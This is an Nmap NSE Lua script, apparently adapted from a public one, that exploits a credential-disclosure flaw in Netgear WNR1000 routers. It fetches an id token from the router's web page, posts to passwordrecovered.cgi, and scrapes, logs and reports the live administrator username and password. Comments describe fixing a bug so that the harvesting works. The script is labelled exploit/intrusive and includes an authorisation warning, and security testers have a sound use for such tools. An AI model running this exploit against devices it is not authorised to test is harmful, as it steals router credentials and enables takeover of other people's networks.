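local http = require "http"
local shortport = require "shortport"
local stdnse = require "stdnse"
local string = require "string"
local vulns = require "vulns"

description = [[
A vulnerability has been discovered in WNR 1000 series that allows an attacker
to retrieve administrator credentials with the router interface.

Tested On Firmware Version(s): V1.0.2.60_60.0.86 (Latest) and V1.0.2.54_60.0.82NA

Vulnerability discovered by c1ph04.
]]

---
-- @usage
-- nmap -sV --script http-vuln-wnr1000-creds -p80 <target>
--
-- @args http-vuln-wnr1000-creds.uri  Base path of the router web interface
--       (default "/"). "passwordrecovered.cgi" is appended to it verbatim,
--       so it must end with a slash.
--
-- @output
-- PORT   STATE SERVICE REASON
-- 80/tcp open  http    syn-ack
-- | http-vuln-wnr1000-creds:
-- |   VULNERABLE:
-- |   Netgear WNR1000v3 Credential Harvesting Exploit
-- |     State: VULNERABLE (Exploitable)
-- |     IDs:  None, 0-day
-- |     Description:
-- |       A vulnerability has been discovered in WNR 1000 series that allows an attacker
-- |       to retrieve administrator credentials with the router interface.
-- |       Tested On Firmware Version(s): V1.0.2.60_60.0.86 (Latest) and V1.0.2.54_60.0.82NA
-- |     Disclosure date: 26-01-2014
-- |     References:
-- |_      http://packetstormsecurity.com/files/download/124759/netgearpasswd-disclose.zip
--
-- NOTE: this script is in the "exploit"/"intrusive" categories on purpose:
-- on a vulnerable device it retrieves, logs (at debug level 1) and reports
-- the live administrator credentials. Only run it against hosts you are
-- authorised to test.
---

author = "Paul AMAR , Rob Nicholls"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
categories = {"exploit", "vuln", "intrusive"}

portrule = shortport.http

--- Placeholder sanitiser kept for readability of the call sites.
-- gsub with an empty pattern inserts empty strings at every position, so the
-- input is returned unchanged. The extra parentheses drop gsub's second
-- return value (the match count) so callers only ever see the string.
-- The router response is only fed to Lua pattern matching and passed as
-- format *arguments* below, so no real escaping is required at present.
-- @param str string to "escape"
-- @return str, unchanged
local escape = function(str)
  return (string.gsub(str, "", ""))
end

--- Script entry point.
-- 1. GET the interface page at <uri> and extract the "id=<digits>" token
--    that passwordrecovered.cgi expects.
-- 2. POST to <uri>passwordrecovered.cgi?id=<digits> and scrape the admin
--    username/password out of the returned HTML.
-- 3. On success mark the host as exploitable and attach the credentials to
--    the vulnerability report; on any failure fall through to a NOT_VULN
--    report (which the vulns library prints only with vulns.showall).
-- @param host Nmap host table
-- @param port Nmap port table
-- @return vulns report output (nil when nothing is reportable)
action = function(host, port)
  local uri = stdnse.get_script_args(SCRIPT_NAME .. ".uri") or "/"

  local vuln = {
    title = 'Netgear WNR1000v3 Credential Harvesting Exploit',
    state = vulns.STATE.NOT_VULN, -- default until credentials are recovered
    description = [[
A vulnerability has been discovered in WNR 1000 series that allows an attacker
to retrieve administrator credentials with the router interface.
Tested On Firmware Version(s): V1.0.2.60_60.0.86 (Latest) and V1.0.2.54_60.0.82NA.
Vulnerability discovered by c1ph04.
]],
    references = {
      'http://c1ph04text.blogspot.dk/2014/01/mitrm-attacks-your-middle-or-mine.html',
    },
    dates = {
      disclosure = {year = '2014', month = '01', day = '26'},
    },
  }

  local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)

  -- Step 1: fetch the interface page. http.get can return a response table
  -- without a body (timeouts, connection errors), and escape()/string.match
  -- would raise on nil, so guard the body explicitly.
  local detection_session = http.get(host, port, uri)
  if not detection_session or not detection_session.body then
    stdnse.print_debug(1, "%s: No usable response from %s", SCRIPT_NAME, uri)
    return vuln_report:make_output(vuln)
  end

  -- The capture keeps the "id=" prefix, so id_netgear is a ready-made query
  -- string. It is digits-only by construction, which is what makes it safe
  -- to splice into the request path below.
  local id_netgear = string.match(escape(detection_session.body), '(id=%d+)')
  if id_netgear == nil then
    stdnse.print_debug(1, "%s: Unable to obtain the id", SCRIPT_NAME)
    return vuln_report:make_output(vuln)
  end

  -- Step 2: ask passwordrecovered.cgi for the credentials.
  local payload_session = http.post(host, port,
    uri .. "passwordrecovered.cgi?" .. id_netgear, { no_cache = true }, nil, "")
  if not payload_session or not payload_session.body then
    stdnse.print_debug(1, "%s: No usable response from passwordrecovered.cgi", SCRIPT_NAME)
    return vuln_report:make_output(vuln)
  end

  local body = escape(payload_session.body)
  local netgear_username = string.match(body,
    'Router Admin Username.+align="left">(.+).+Router Admin')
  local netgear_password = string.match(body,
    'Router Admin Password.+align="left">(.+).+MNUText')

  -- Bug fix: the original compared the undeclared globals `username` and
  -- `password` (always nil), so the success branch was unreachable and the
  -- script never reported anything.
  if netgear_username == nil or netgear_password == nil then
    stdnse.print_debug(1, "%s: We haven't been able to get username/password", SCRIPT_NAME)
    return vuln_report:make_output(vuln)
  end

  -- Security: the harvested values come from an untrusted device response.
  -- Pass them as format arguments rather than concatenating them into the
  -- format string, so a '%' in a password cannot break or steer print_debug.
  stdnse.print_debug(1, "%s: username : %s", SCRIPT_NAME, netgear_username)
  stdnse.print_debug(1, "%s: password : %s", SCRIPT_NAME, netgear_password)

  -- Step 3: report. EXPLOIT renders as "VULNERABLE (Exploitable)", matching
  -- the documented @output above.
  vuln.state = vulns.STATE.EXPLOIT
  vuln.extra_info = string.format("Username: %s\nPassword: %s\n",
    netgear_username, netgear_password)
  return vuln_report:make_output(vuln)
end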